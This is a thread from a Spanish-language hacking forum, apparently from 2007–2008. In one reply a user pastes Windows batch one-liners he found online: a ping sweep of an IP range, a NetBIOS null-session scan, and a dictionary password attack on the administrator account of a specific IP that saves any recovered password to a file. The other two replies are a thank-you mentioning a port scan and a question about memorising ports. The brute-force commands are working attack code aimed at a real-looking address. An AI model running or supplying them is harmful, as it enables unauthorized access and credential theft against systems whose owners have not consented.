|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
capsul
Visitante
|
 |
« Respuesta #84 en: Diciembre 22, 2007, 08:37:09 » |
|
Exelente gracias por compartir los conocimientos  Hice tambien eso del scan de puertos y todos estan cerrados saludos Capcul
|
|
|
|
|
|
|
|
|
|
|
Trainn
Miembro

|
 |
« Respuesta #86 en: Enero 17, 2008, 04:21:56 » |
|
 estbe investigando sobre mi duda e encontrado algo que puede ser bueno para iniciar. Escaner cutre de ip's usando ping FOR /L %i IN (1,1,254) DO ping 80.36.230.%i >>escaner.txt esto escanerá las ip's del rango 80.36.230.1 a 254 y vuelca el contenido en el fichero escaner.txt, prepárate a leerlo, bueno con un editor puedes filtrar las respuestas positivas Versión mejorada jaja FOR /L %i IN (1,1,254) DO echo %time% %date%>>escaner.txt && ping -n 1 80.36.230.%i >>escaner.txt lo mismo pero con fecha y hora y con un sola petición de eco (no cuatro) EScaner Netbios xDDDD FOR /L %i IN (235,1,254) DO net use \\80.36.230.%i\ipc$ "" /u:"" 2>> nul && echo %date% >> escaner.txt && echo 80.36.230.%i >>escaner.txt. ATAQUE A NETBIOS POR DICCIONARIO, hala! a por la clave del administrador..... Se supone que existe un archivo que se llama claves.txt con un buen diccionario de palabras.... FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador Esto no para, mal asunto.... vamos a guardar la password, si la encontramos en un fichero llamado pass.txt FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador && echo clave: %i >> pass.txt Y si no queremos ver las salidas erroneas dentro del fichero.... FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador 2>>nul && echo clave: %i >> pass.txt Pues nada, ya sólo queda encontrar un buen diccionario y a asaltar el server de pruebas, que me parece que hay premio para el que lo consiga...  bueno eso lo encontre en lo que daba vueltas por google.  pero esta bien dada esa informacion...si alguien me lo puede confirmar de antemano gracias 
|
|
|
|
|
|
Un mejor camino ser AUTODIDACTA
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
soldier
Visitante
|
 |
« Respuesta #99 en: Junio 04, 2008, 05:11:57 » |
|
Voy a hacer una pregunta que creo que es estupida  Recuerdan todo esos montones de puertos? o recurren a alguna guía o algun metodo cada vez que necesitan uno?? gracias por adelantado por su respuesta
|
|
|
|
|
|
|
|
|